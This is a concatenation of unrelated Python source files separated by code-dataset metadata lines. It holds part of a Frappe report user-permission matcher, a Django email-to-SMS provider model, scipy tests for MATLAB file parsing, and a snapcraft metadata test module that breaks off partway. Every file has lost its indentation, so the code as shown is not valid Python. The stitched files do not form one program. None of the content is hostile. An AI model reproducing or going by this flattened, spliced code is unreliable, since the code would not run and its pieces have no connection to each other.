"""Returns True if after evaluating permissions for each linked doctype
- There is an owner match for the ref_doctype
- `and` There is a user permission match for all linked doctypes
Returns True if the row is empty
Note:
Each doctype could have multiple conflicting user permission doctypes.
Hence even if one of the sets allows a match, it is true.
This behavior is equivalent to the trickling of user permissions of linked doctypes to the ref doctype.
"""
resultant_match = True
if not row:
# allow empty rows :)
return resultant_match
for doctype, filter_list in doctype_match_filters.items():
matched_for_doctype = False
if doctype==ref_doctype and if_owner:
idx = linked_doctypes.get("User")
if (idx is not None
and row[idx]==frappe.session.user
and columns_dict[idx]==columns_dict.get("owner")):
# owner match is true
matched_for_doctype = True
if not matched_for_doctype:
for match_filters in filter_list:
match = True
for dt, idx in linked_doctypes.items():
# case handled above
if dt=="User" and columns_dict[idx]==columns_dict.get("owner"):
continue
if dt in match_filters and row[idx] not in match_filters[dt]:
match = False
break
# each doctype could have multiple conflicting user permission doctypes, hence using OR
# so that even if one of the sets allows a match, it is true
matched_for_doctype = matched_for_doctype or match
if matched_for_doctype:
break
# each doctype's user permissions should match the row! hence using AND
resultant_match = resultant_match and matched_for_doctype
if not resultant_match:
break
return resultant_match
def get_linked_doctypes(columns, data):
linked_doctypes = {}
columns_dict = get_columns_dict(columns)
for idx, col in enumerate(columns):
df = columns_dict[idx]
if df.get("fieldtype")=="Link":
if isinstance(col, basestring):
linked_doctypes[df["options"]] = idx
else:
# dict
linked_doctypes[df["options"]] = df["fieldname"]
# remove doctype if column is empty
columns_with_value = []
for row in data:
if row:
if len(row) != len(columns_with_value):
if isinstance(row, (list, tuple)):
row = enumerate(row)
elif isinstance(row, dict):
row = row.items()
for col, val in row:
if val and col not in columns_with_value:
columns_with_value.append(col)
for doctype, key in linked_doctypes.items():
if key not in columns_with_value:
del linked_doctypes[doctype]
return linked_doctypes
def get_columns_dict(columns):
"""Returns a dict with column docfield values as dict
The keys for the dict are both idx and fieldname,
so either index or fieldname can be used to search for a column's docfield properties
"""
columns_dict = {}
for idx, col in enumerate(columns):
col_dict = {}
# string
if isinstance(col, basestring):
col = col.split(":")
if len(col) > 1:
if "/" in col[1]:
col_dict["fieldtype"], col_dict["options"] = col[1].split("/")
else:
col_dict["fieldtype"] = col[1]
col_dict["fieldname"] = frappe.scrub(col[0])
# dict
else:
col_dict.update(col)
if "fieldname" not in col_dict:
col_dict["fieldname"] = frappe.scrub(col_dict["label"])
columns_dict[idx] = col_dict
columns_dict[col_dict["fieldname"]] = col_dict
return columns_dict
def get_user_match_filters(doctypes, ref_doctype):
match_filters = {}
for dt in doctypes:
filter_list = frappe.desk.reportview.build_match_conditions(dt, False)
if filter_list:
match_filters[dt] = filter_list
return match_filters
|
mit
|
mainecivichackday/wheresyourtrash
|
wheresyourtrash/apps/email2sms/models.py
|
2
|
1080
|
from django.core.urlresolvers import reverse
from django.db.models import *
from django_extensions.db.fields import AutoSlugField
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import models as auth_models
from django.db import models as models
from django_extensions.db import fields as extension_fields
class Provider(models.Model):
# Fields
name = models.CharField(max_length=255)
slug = extension_fields.AutoSlugField(populate_from='name', blank=True)
created = models.DateTimeField(auto_now_add=True, editable=False)
last_updated = models.DateTimeField(auto_now=True, editable=False)
email_root = models.CharField(max_length=50)
class Meta:
ordering = ('-created',)
def __str__(self):
return u'%s' % self.name
def get_absolute_url(self):
return reverse('email2sms_provider_detail', args=(self.slug,))
def get_update_url(self):
return reverse('email2sms_provider_update', args=(self.slug,))
|
bsd-3-clause
|
drpeteb/scipy
|
scipy/io/matlab/tests/test_mio5_utils.py
|
106
|
5604
|
""" Testing mio5_utils Cython module
"""
from __future__ import division, print_function, absolute_import
import sys
from io import BytesIO
cStringIO = BytesIO
import numpy as np
from nose.tools import (assert_true, assert_equal, assert_raises)
from numpy.testing import (assert_array_equal, run_module_suite)
from scipy._lib.six import u
import scipy.io.matlab.byteordercodes as boc
import scipy.io.matlab.streams as streams
import scipy.io.matlab.mio5_params as mio5p
import scipy.io.matlab.mio5_utils as m5u
def test_byteswap():
for val in (
1,
0x100,
0x10000):
a = np.array(val, dtype=np.uint32)
b = a.byteswap()
c = m5u.byteswap_u4(a)
assert_equal(b.item(), c)
d = m5u.byteswap_u4(c)
assert_equal(a.item(), d)
def _make_tag(base_dt, val, mdtype, sde=False):
''' Makes a simple matlab tag, full or sde '''
base_dt = np.dtype(base_dt)
bo = boc.to_numpy_code(base_dt.byteorder)
byte_count = base_dt.itemsize
if not sde:
udt = bo + 'u4'
padding = 8 - (byte_count % 8)
all_dt = [('mdtype', udt),
('byte_count', udt),
('val', base_dt)]
if padding:
all_dt.append(('padding', 'u1', padding))
else: # is sde
udt = bo + 'u2'
padding = 4-byte_count
if bo == '<': # little endian
all_dt = [('mdtype', udt),
('byte_count', udt),
('val', base_dt)]
else: # big endian
all_dt = [('byte_count', udt),
('mdtype', udt),
('val', base_dt)]
if padding:
all_dt.append(('padding', 'u1', padding))
tag = np.zeros((1,), dtype=all_dt)
tag['mdtype'] = mdtype
tag['byte_count'] = byte_count
tag['val'] = val
return tag
def _write_stream(stream, *strings):
stream.truncate(0)
stream.seek(0)
for s in strings:
stream.write(s)
stream.seek(0)
def _make_readerlike(stream, byte_order=boc.native_code):
class R(object):
pass
r = R()
r.mat_stream = stream
r.byte_order = byte_order
r.struct_as_record = True
r.uint16_codec = sys.getdefaultencoding()
r.chars_as_strings = False
r.mat_dtype = False
r.squeeze_me = False
return r
def test_read_tag():
# mainly to test errors
# make reader-like thing
str_io = BytesIO()
r = _make_readerlike(str_io)
c_reader = m5u.VarReader5(r)
# This works for StringIO but _not_ cStringIO
assert_raises(IOError, c_reader.read_tag)
# bad SDE
tag = _make_tag('i4', 1, mio5p.miINT32, sde=True)
tag['byte_count'] = 5
_write_stream(str_io, tag.tostring())
assert_raises(ValueError, c_reader.read_tag)
def test_read_stream():
tag = _make_tag('i4', 1, mio5p.miINT32, sde=True)
tag_str = tag.tostring()
str_io = cStringIO(tag_str)
st = streams.make_stream(str_io)
s = streams._read_into(st, tag.itemsize)
assert_equal(s, tag.tostring())
def test_read_numeric():
# make reader-like thing
str_io = cStringIO()
r = _make_readerlike(str_io)
# check simplest of tags
for base_dt, val, mdtype in (('u2', 30, mio5p.miUINT16),
('i4', 1, mio5p.miINT32),
('i2', -1, mio5p.miINT16)):
for byte_code in ('<', '>'):
r.byte_order = byte_code
c_reader = m5u.VarReader5(r)
assert_equal(c_reader.little_endian, byte_code == '<')
assert_equal(c_reader.is_swapped, byte_code != boc.native_code)
for sde_f in (False, True):
dt = np.dtype(base_dt).newbyteorder(byte_code)
a = _make_tag(dt, val, mdtype, sde_f)
a_str = a.tostring()
_write_stream(str_io, a_str)
el = c_reader.read_numeric()
assert_equal(el, val)
# two sequential reads
_write_stream(str_io, a_str, a_str)
el = c_reader.read_numeric()
assert_equal(el, val)
el = c_reader.read_numeric()
assert_equal(el, val)
def test_read_numeric_writeable():
# make reader-like thing
str_io = cStringIO()
r = _make_readerlike(str_io, '<')
c_reader = m5u.VarReader5(r)
dt = np.dtype('<u2')
a = _make_tag(dt, 30, mio5p.miUINT16, 0)
a_str = a.tostring()
_write_stream(str_io, a_str)
el = c_reader.read_numeric()
assert_true(el.flags.writeable)
def test_zero_byte_string():
# Tests hack to allow chars of non-zero length, but 0 bytes
# make reader-like thing
str_io = cStringIO()
r = _make_readerlike(str_io, boc.native_code)
c_reader = m5u.VarReader5(r)
tag_dt = np.dtype([('mdtype', 'u4'), ('byte_count', 'u4')])
tag = np.zeros((1,), dtype=tag_dt)
tag['mdtype'] = mio5p.miINT8
tag['byte_count'] = 1
hdr = m5u.VarHeader5()
# Try when string is 1 length
hdr.set_dims([1,])
_write_stream(str_io, tag.tostring() + b' ')
str_io.seek(0)
val = c_reader.read_char(hdr)
assert_equal(val, u(' '))
# Now when string has 0 bytes 1 length
tag['byte_count'] = 0
_write_stream(str_io, tag.tostring())
str_io.seek(0)
val = c_reader.read_char(hdr)
assert_equal(val, u(' '))
# Now when string has 0 bytes 4 length
str_io.seek(0)
hdr.set_dims([4,])
val = c_reader.read_char(hdr)
assert_array_equal(val, [u(' ')] * 4)
if __name__ == "__main__":
run_module_suite()
|
bsd-3-clause
|
elopio/snapcraft
|
tests/unit/test_meta.py
|
1
|
39249
|
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015-2018 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import configparser
import logging
import os
from unittest.mock import patch
import fixtures
import testscenarios
import testtools
import yaml
from testtools.matchers import (
Contains,
Equals,
FileContains,
FileExists,
HasLength,
Not
)
from snapcraft.internal.meta import (
_errors as meta_errors,
_snap_packaging
)
from snapcraft import ProjectOptions, extractors
from snapcraft.internal import common
from snapcraft.internal import errors
from snapcraft.internal import project_loader
from tests import unit, fixture_setup
class CreateBaseTestCase(unit.TestCase):
def setUp(self):
super().setUp()
self.config_data = {
'architectures': ['amd64'],
'name': 'my-package',
'version': '1.0',
'description': 'my description',
'summary': 'my summary',
'confinement': 'devmode',
'environment': {
'GLOBAL': 'y',
},
'parts': {
'test-part': {
'plugin': 'nil',
}
}
}
patcher = patch(
'snapcraft.internal.project_loader.get_snapcraft_yaml')
self.mock_get_yaml = patcher.start()
self.mock_get_yaml.return_value = os.path.join(
'snap', 'snapcraft.yaml')
self.addCleanup(patcher.stop)
# Ensure the ensure snapcraft.yaml method has something to copy.
_create_file(os.path.join('snap', 'snapcraft.yaml'))
self.meta_dir = os.path.join(self.prime_dir, 'meta')
self.hooks_dir = os.path.join(self.meta_dir, 'hooks')
self.snap_yaml = os.path.join(self.meta_dir, 'snap.yaml')
self.project_options = ProjectOptions()
def generate_meta_yaml(self, *, build=False):
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
self.config = project_loader.load_config()
if build:
for part in self.config.parts.all_parts:
part.pull()
part.build()
_snap_packaging.create_snap_packaging(
self.config.data, self.config.parts, self.project_options, 'dummy')
self.assertTrue(
os.path.exists(self.snap_yaml), 'snap.yaml was not created')
with open(self.snap_yaml) as f:
return yaml.load(f)
class CreateTestCase(CreateBaseTestCase):
def test_create_meta(self):
y = self.generate_meta_yaml()
expected = {'architectures': ['amd64'],
'confinement': 'devmode',
'grade': 'stable',
'description': 'my description',
'environment': {'GLOBAL': 'y'},
'summary': 'my summary',
'name': 'my-package',
'version': '1.0'}
self.assertThat(y, Equals(expected))
def test_create_meta_with_epoch(self):
self.config_data['epoch'] = '1*'
y = self.generate_meta_yaml()
self.assertTrue(
'epoch' in y,
'Expected "epoch" property to be copied into snap.yaml')
self.assertThat(y['epoch'], Equals('1*'))
def test_create_meta_with_assumes(self):
self.config_data['assumes'] = ['feature1', 'feature2']
y = self.generate_meta_yaml()
self.assertTrue(
'assumes' in y,
'Expected "assumes" property to be copied into snap.yaml')
self.assertThat(y['assumes'], Equals(['feature1', 'feature2']))
def test_create_gadget_meta_with_gadget_yaml(self):
gadget_yaml = 'stub entry: stub value'
_create_file('gadget.yaml', content=gadget_yaml)
self.config_data['type'] = 'gadget'
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
config = project_loader.load_config()
_snap_packaging.create_snap_packaging(
self.config_data, config.parts, self.project_options, 'dummy')
expected_gadget = os.path.join(self.meta_dir, 'gadget.yaml')
self.assertTrue(os.path.exists(expected_gadget))
self.assertThat(expected_gadget, FileContains(gadget_yaml))
def test_create_gadget_meta_with_missing_gadget_yaml_raises_error(self):
self.config_data['type'] = 'gadget'
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
config = project_loader.load_config()
self.assertRaises(
errors.MissingGadgetError,
_snap_packaging.create_snap_packaging,
self.config_data,
config.parts,
self.project_options,
'dummy'
)
def test_create_meta_with_declared_icon(self):
_create_file(os.path.join(os.curdir, 'my-icon.png'))
self.config_data['icon'] = 'my-icon.png'
y = self.generate_meta_yaml()
self.assertThat(os.path.join(self.meta_dir, 'gui', 'icon.png'),
FileExists())
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_declared_icon_with_dots(self):
_create_file('com.my.icon.png')
self.config_data['icon'] = 'com.my.icon.png'
y = self.generate_meta_yaml()
self.assertThat(os.path.join(self.meta_dir, 'gui', 'icon.png'),
FileExists())
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_declared_icon_in_parent_dir(self):
_create_file('my-icon.png')
builddir = os.path.join(os.curdir, 'subdir')
os.mkdir(builddir)
os.chdir(builddir)
self.config_data['icon'] = '../my-icon.png'
y = self.generate_meta_yaml()
self.assertThat(os.path.join(self.meta_dir, 'gui', 'icon.png'),
FileExists())
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_declared_icon_and_setup(self):
fake_logger = fixtures.FakeLogger(level=logging.INFO)
self.useFixture(fake_logger)
gui_path = os.path.join('setup', 'gui')
os.makedirs(gui_path)
setup_icon_content = 'setup icon'
_create_file(os.path.join(gui_path, 'icon.png'),
content=setup_icon_content)
declared_icon_content = 'declared icon'
_create_file('my-icon.png',
content=declared_icon_content)
self.config_data['icon'] = 'my-icon.png'
y = self.generate_meta_yaml()
expected_icon = os.path.join(self.meta_dir, 'gui', 'icon.png')
self.assertTrue(os.path.exists(expected_icon),
'icon.png was not setup correctly')
self.assertThat(expected_icon, FileContains(declared_icon_content))
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
# Check for the correct deprecation message.
self.assertIn(
"Assets in 'setup/gui' should now be placed in 'snap/gui'.",
fake_logger.output)
self.assertIn(
"See http://snapcraft.io/docs/deprecation-notices/dn3",
fake_logger.output)
def test_create_meta_with_declared_icon_and_setup_ran_twice_ok(self):
gui_path = os.path.join('setup', 'gui')
os.makedirs(gui_path)
icon_content = 'setup icon'
_create_file(os.path.join(gui_path, 'icon.png'), content=icon_content)
_create_file('my-icon.png')
self.config_data['icon'] = 'my-icon.png'
os.makedirs('snap', exist_ok=True)
with open(os.path.join('snap', 'snapcraft.yaml'), 'w') as f:
f.write(yaml.dump(self.config_data))
config = project_loader.load_config()
_snap_packaging.create_snap_packaging(
self.config_data, config.parts, self.project_options, 'dummy')
# Running again should be good
_snap_packaging.create_snap_packaging(
self.config_data, config.parts, self.project_options, 'dummy')
def test_create_meta_with_icon_in_setup(self):
gui_path = os.path.join('setup', 'gui')
os.makedirs(gui_path)
icon_content = 'setup icon'
_create_file(os.path.join(gui_path, 'icon.png'), content=icon_content)
y = self.generate_meta_yaml()
expected_icon = os.path.join(self.meta_dir, 'gui', 'icon.png')
self.assertThat(expected_icon, FileContains(icon_content))
self.assertFalse('icon' in y,
'icon found in snap.yaml {}'.format(y))
def test_create_meta_with_sockets(self):
os.mkdir(self.prime_dir)
_create_file(os.path.join(self.prime_dir, 'app.sh'))
sockets = {
'sock1': {
'listen-stream': 8080,
},
'sock2': {
'listen-stream': '$SNAP_COMMON/sock2',
'socket-mode': 0o640}}
self.config_data['apps'] = {
'app': {'command': 'app.sh',
'sockets': sockets}}
y = self.generate_meta_yaml()
self.assertThat(y['apps']['app']['sockets'], Equals(sockets))
def test_version_script(self):
self.config_data['version-script'] = 'echo 10.1-devel'
y = self.generate_meta_yaml()
self.assertThat(y['version'], Equals('10.1-devel'))
def test_version_script_exits_bad(self):
self.config_data['version-script'] = 'exit 1'
with testtools.ExpectedException(meta_errors.CommandError):
self.generate_meta_yaml()
def test_version_script_with_no_output(self):
self.config_data['version-script'] = 'echo'
with testtools.ExpectedException(meta_errors.CommandError):
self.generate_meta_yaml()
def test_create_meta_with_app(self):
os.mkdir(self.prime_dir)
_create_file(os.path.join(self.prime_dir, 'app.sh'))
self.config_data['apps'] = {
'app1': {'command': 'app.sh'},
'app2': {'command': 'app.sh', 'plugs': ['network']},
'app3': {'command': 'app.sh', 'plugs': ['network-server']},
'app4': {'command': 'app.sh', 'plugs': ['network-server'],
'environment': {'XDG_SOMETHING': '$SNAP_USER_DATA',
'LANG': 'C'}},
'app5': {'command': 'app.sh', 'common-id': 'test-common-id'}
}
self.config_data['plugs'] = {
'network-server': {'interface': 'network-bind'}}
y = self.generate_meta_yaml()
for app in ['app1', 'app2', 'app3']:
app_wrapper_path = os.path.join(
self.prime_dir, 'command-{}.wrapper'.format(app))
self.assertTrue(
os.path.exists(app_wrapper_path),
'the wrapper for {!r} was not setup correctly'.format(app))
expected = {
'architectures': ['amd64'],
'apps': {
'app1': {
'command': 'command-app1.wrapper',
},
'app2': {
'command': 'command-app2.wrapper',
'plugs': ['network'],
},
'app3': {
'command': 'command-app3.wrapper',
'plugs': ['network-server'],
},
'app4': {
'command': 'command-app4.wrapper',
'plugs': ['network-server'],
'environment': {
'XDG_SOMETHING': '$SNAP_USER_DATA',
'LANG': 'C'}
},
'app5': {
'command': 'command-app5.wrapper',
'common-id': 'test-common-id'
}
},
'description': 'my description',
'summary': 'my summary',
'name': 'my-package',
'version': '1.0',
'confinement': 'devmode',
'grade': 'stable',
'environment': {'GLOBAL': 'y'},
'plugs': {
'network-server': {
'interface': 'network-bind',
}
}
}
self.assertThat(y, Equals(expected))
def test_create_meta_with_app_desktop_key(self):
os.mkdir(self.prime_dir)
_create_file(os.path.join(self.prime_dir, 'app.sh'))
_create_file(os.path.join(self.prime_dir, 'app1.desktop'),
content='[Desktop Entry]\nExec=app1.exe\nIcon=app1.png')
icon_dir = os.path.join(self.prime_dir, 'usr', 'share')
os.makedirs(icon_dir)
_create_file(os.path.join(icon_dir, 'app2.png'))
_create_file(os.path.join(self.prime_dir, 'app2.desktop'),
content='[Desktop Entry]\nExec=app2.exe\nIcon=/usr/share/'
'app2.png')
_create_file(os.path.join(self.prime_dir, 'app3.desktop'),
content='[Desktop Entry]\nExec=app3.exe\nIcon=app3.png')
self.config_data['apps'] = {
'app1': {'command': 'app.sh', 'desktop': 'app1.desktop'},
'app2': {'command': 'app.sh', 'desktop': 'app2.desktop'},
'my-package': {'command': 'app.sh', 'desktop': 'app3.desktop'}
}
self.generate_meta_yaml()
desktop_file = os.path.join(self.meta_dir, 'gui', 'app1.desktop')
self.assertThat(desktop_file, FileExists())
contents = configparser.ConfigParser(interpolation=None)
contents.read(desktop_file)
section = 'Desktop Entry'
self.assertTrue(section in contents)
self.assertThat(
contents[section].get('Exec'), Equals('my-package.app1 %U'))
self.assertThat(contents[section].get('Icon'), Equals('app1.png'))
desktop_file = os.path.join(self.meta_dir, 'gui', 'app2.desktop')
self.assertThat(desktop_file, FileExists())
contents = configparser.ConfigParser(interpolation=None)
contents.read(desktop_file)
section = 'Desktop Entry'
self.assertTrue(section in contents)
self.assertThat(
contents[section].get('Exec'), Equals('my-package.app2 %U'))
self.assertThat(contents[section].get('Icon'),
Equals('${SNAP}/usr/share/app2.png'))
desktop_file = os.path.join(self.meta_dir, 'gui', 'my-package.desktop')
self.assertThat(desktop_file, FileExists())
contents = configparser.ConfigParser(interpolation=None)
contents.read(desktop_file)
section = 'Desktop Entry'
self.assertTrue(section in contents)
self.assertThat(contents[section].get('Exec'), Equals('my-package %U'))
snap_yaml = os.path.join('prime', 'meta', 'snap.yaml')
self.assertThat(snap_yaml, Not(FileContains('desktop: app1.desktop')))
self.assertThat(snap_yaml, Not(FileContains('desktop: app2.desktop')))
self.assertThat(snap_yaml, Not(FileContains('desktop: app3.desktop')))
self.assertThat(snap_yaml,
Not(FileContains('desktop: my-package.desktop')))
def test_create_meta_with_hook(self):
hooksdir = os.path.join(self.snap_dir, 'hooks')
os.makedirs(hooksdir)
_create_file(os.path.join(hooksdir, 'foo'), executable=True)
_create_file(os.path.join(hooksdir, 'bar'), executable=True)
self.config_data['hooks'] = {
'foo': {'plugs': ['plug']},
'bar': {}
}
y = self.generate_meta_yaml()
self.assertThat(
y, Contains('hooks'), "Expected generated YAML to contain 'hooks'")
for hook in ('foo', 'bar'):
generated_hook_path = os.path.join(
self.prime_dir, 'meta', 'hooks', hook)
self.assertThat(
generated_hook_path, FileExists(),
'The {!r} hook was not setup correctly'.format(hook))
self.assertThat(
y['hooks'], Contains(hook),
'Expected generated hooks to contain {!r}'.format(hook))
self.assertThat(
y['hooks']['foo'], Contains('plugs'),
"Expected generated 'foo' hook to contain 'plugs'")
self.assertThat(y['hooks']['foo']['plugs'], HasLength(1))
self.assertThat(y['hooks']['foo']['plugs'][0], Equals('plug'))
self.assertThat(
y['hooks']['bar'], Not(Contains('plugs')),
"Expected generated 'bar' hook to not contain 'plugs'")
class CreateMetadataFromSourceBaseTestCase(CreateBaseTestCase):
def setUp(self):
super().setUp()
self.config_data = {
'name': 'test-name',
'version': 'test-version',
'summary': 'test-summary',
'description': 'test-description',
'adopt-info': 'test-part',
'parts': {
'test-part': {
'plugin': 'nil',
'parse-info': ['test-metadata-file']
}
},
'apps': {
'test-app': {
'command': 'echo'
}
}
}
# Create metadata file
open('test-metadata-file', 'w').close()
class CreateMetadataFromSourceErrorsTestCase(
CreateMetadataFromSourceBaseTestCase):
def test_create_metadata_with_missing_parse_info(self):
del self.config_data['summary']
del self.config_data['parts']['test-part']['parse-info']
raised = self.assertRaises(
meta_errors.AdoptedPartNotParsingInfo,
self.generate_meta_yaml)
self.assertThat(raised.part, Equals('test-part'))
def test_create_metadata_with_wrong_adopt_info(self):
del self.config_data['summary']
self.config_data['adopt-info'] = 'wrong-part'
raised = self.assertRaises(
meta_errors.AdoptedPartMissingError, self.generate_meta_yaml)
self.assertThat(raised.part, Equals('wrong-part'))
def test_metadata_doesnt_overwrite_specified(self):
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
summary='extracted summary',
description='extracted description')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
y = self.generate_meta_yaml(build=True)
# Since both summary and description were specified, neither should be
# overwritten
self.assertThat(y['summary'], Equals(self.config_data['summary']))
self.assertThat(
y['description'], Equals(self.config_data['description']))
def test_metadata_with_unexisting_icon(self):
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
icon='test/extracted/unexistent/icon/path')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
# The meta generation should just ignore the dead path, and not fail.
self.generate_meta_yaml(build=True)
def test_metadata_satisfies_required_property(self):
del self.config_data['summary']
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
summary='extracted summary',
description='extracted description')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
y = self.generate_meta_yaml(build=True)
# Summary should come from the extracted metadata, while description
# should not.
self.assertThat(y['summary'], Equals('extracted summary'))
self.assertThat(
y['description'], Equals(self.config_data['description']))
def test_metadata_not_all_properties_satisfied(self):
del self.config_data['summary']
del self.config_data['description']
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
description='extracted description')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
# Assert that description has been satisfied by extracted metadata, but
# summary has not.
raised = self.assertRaises(
meta_errors.MissingSnapcraftYamlKeysError,
self.generate_meta_yaml, build=True)
self.assertThat(raised.keys, Equals("'summary'"))
class MetadataFromSourceWithIconFileTestCase(
CreateMetadataFromSourceBaseTestCase):
scenarios = testscenarios.multiply_scenarios(
(('setup/gui', dict(directory=os.path.join('setup', 'gui'))),
('snap/gui', dict(directory=os.path.join('snap', 'gui')))),
(('icon.png', dict(file_name='icon.png')),
('icon.svg', dict(file_name='icon.svg')))
)
def test_metadata_doesnt_overwrite_icon_file(self):
os.makedirs(self.directory)
icon_content = 'setup icon'
_create_file(
os.path.join(self.directory, self.file_name),
content=icon_content)
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
icon='test/extracted/unexistent/icon/path')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
self.generate_meta_yaml(build=True)
expected_icon = os.path.join(self.meta_dir, 'gui', self.file_name)
self.assertThat(expected_icon, FileContains(icon_content))
class MetadataFromSourceWithDesktopFileTestCase(
CreateMetadataFromSourceBaseTestCase):
scenarios = (
('setup/gui', dict(directory=os.path.join('setup', 'gui'))),
('snap/gui', dict(directory=os.path.join('snap', 'gui')))
)
def test_metadata_doesnt_overwrite_desktop_file(self):
os.makedirs(self.directory)
desktop_content = 'setup desktop'
_create_file(
os.path.join(self.directory, 'test-app.desktop'),
content=desktop_content)
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
desktop_file_paths=[
'usr/share/applications/com.example.test/app.desktop'])
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
self.generate_meta_yaml(build=True)
expected_desktop = os.path.join(
self.meta_dir, 'gui', 'test-app.desktop')
self.assertThat(expected_desktop, FileContains(desktop_content))
class WriteSnapDirectoryTestCase(CreateBaseTestCase):
def test_write_snap_directory(self):
# Setup a snap directory containing a few things.
_create_file(os.path.join(self.snap_dir, 'snapcraft.yaml'))
_create_file(
os.path.join(self.snap_dir, 'hooks', 'test-hook'), executable=True)
# Now write the snap directory, and verify everything was migrated, as
# well as the hook making it into meta/.
self.generate_meta_yaml()
prime_snap_dir = os.path.join(self.prime_dir, 'snap')
self.assertThat(
os.path.join(prime_snap_dir, 'hooks', 'test-hook'), FileExists())
self.assertThat(
os.path.join(self.hooks_dir, 'test-hook'), FileExists())
# The hook should be empty, because the one in snap/hooks is empty, and
# no wrapper is generated (i.e. that hook is copied to both locations).
self.assertThat(
os.path.join(self.hooks_dir, 'test-hook'), FileContains(''))
def test_snap_hooks_overwrite_part_hooks(self):
# Setup a prime/snap directory containing a hook.
part_hook = os.path.join(self.prime_dir, 'snap', 'hooks', 'test-hook')
_create_file(part_hook, content='from part', executable=True)
# Setup a snap directory containing the same hook
snap_hook = os.path.join(self.snap_dir, 'hooks', 'test-hook')
_create_file(snap_hook, content='from snap', executable=True)
# Now write the snap directory, and verify that the snap hook overwrote
# the part hook in both prime/snap/hooks and prime/meta/hooks.
self.generate_meta_yaml()
prime_snap_dir = os.path.join(self.prime_dir, 'snap')
self.assertThat(
os.path.join(prime_snap_dir, 'hooks', 'test-hook'), FileExists())
self.assertThat(
os.path.join(self.hooks_dir, 'test-hook'), FileExists())
# Both hooks in snap/hooks and meta/hooks should contain 'from snap' as
# that one should have overwritten the other (and its wrapper).
self.assertThat(
os.path.join(self.prime_dir, 'snap', 'hooks', 'test-hook'),
FileContains('from snap'))
self.assertThat(
os.path.join(self.prime_dir, 'meta', 'hooks', 'test-hook'),
FileContains('from snap'))
def test_snap_hooks_not_executable_raises(self):
# Setup a snap directory containing a few things.
_create_file(os.path.join(self.snap_dir, 'snapcraft.yaml'))
_create_file(os.path.join(self.snap_dir, 'hooks', 'test-hook'))
# Now write the snap directory. This process should fail as the hook
# isn't executable.
with testtools.ExpectedException(meta_errors.CommandError,
"hook 'test-hook' is not executable"):
self.generate_meta_yaml()
class GenerateHookWrappersTestCase(CreateBaseTestCase):
def test_generate_hook_wrappers(self):
# Set up the prime directory to contain a few hooks in snap/hooks
snap_hooks_dir = os.path.join(self.prime_dir, 'snap', 'hooks')
hook1_path = os.path.join(snap_hooks_dir, 'test-hook1')
hook2_path = os.path.join(snap_hooks_dir, 'test-hook2')
for path in (hook1_path, hook2_path):
_create_file(path, executable=True)
# Now generate hook wrappers, and verify that they're correct
self.generate_meta_yaml()
for hook in ('test-hook1', 'test-hook2'):
hook_path = os.path.join(self.hooks_dir, hook)
self.assertThat(hook_path, FileExists())
self.assertThat(hook_path, unit.IsExecutable())
# The hook in meta/hooks should exec the one in snap/hooks, as it's
# a wrapper generated by snapcraft.
self.assertThat(
hook_path, FileContains(matcher=Contains(
'exec "$SNAP/snap/hooks/{}"'.format(hook))))
def test_generate_hook_wrappers_not_executable_raises(self):
# Set up the prime directory to contain a hook in snap/hooks that is
# not executable.
snap_hooks_dir = os.path.join(self.prime_dir, 'snap', 'hooks')
_create_file(os.path.join(snap_hooks_dir, 'test-hook'))
# Now attempt to generate hook wrappers. This should fail, as the hook
# itself is not executable.
with testtools.ExpectedException(meta_errors.CommandError,
"hook 'test-hook' is not executable"):
self.generate_meta_yaml()
class CreateWithConfinementTestCase(CreateBaseTestCase):
scenarios = [(confinement, dict(confinement=confinement)) for
confinement in ['strict', 'devmode', 'classic']]
def test_create_meta_with_confinement(self):
self.config_data['confinement'] = self.confinement
y = self.generate_meta_yaml()
self.assertTrue(
'confinement' in y,
'Expected "confinement" property to be in snap.yaml')
self.assertThat(y['confinement'], Equals(self.confinement))
class EnsureFilePathsTestCase(CreateBaseTestCase):
scenarios = [
('desktop', dict(
filepath='usr/share/desktop/desktop.desktop',
content='[Desktop Entry]\nExec=app2.exe\nIcon=/usr/share/app2.png',
key='desktop')),
('completer', dict(
filepath='usr/share/completions/complete.sh',
content='#/bin/bash\n',
key='completer')),
]
def test_file_path_entry(self):
self.config_data['apps'] = {
'app': {
'command': 'echo "hello"',
self.key: self.filepath,
}
}
_create_file(os.path.join('prime', self.filepath),
content=self.content)
# If the path exists this should not fail
self.generate_meta_yaml()
class EnsureFilePathsTestCaseFails(CreateBaseTestCase):
scenarios = [
('desktop', dict(
filepath='usr/share/desktop/desktop.desktop',
key='desktop')),
('completer', dict(
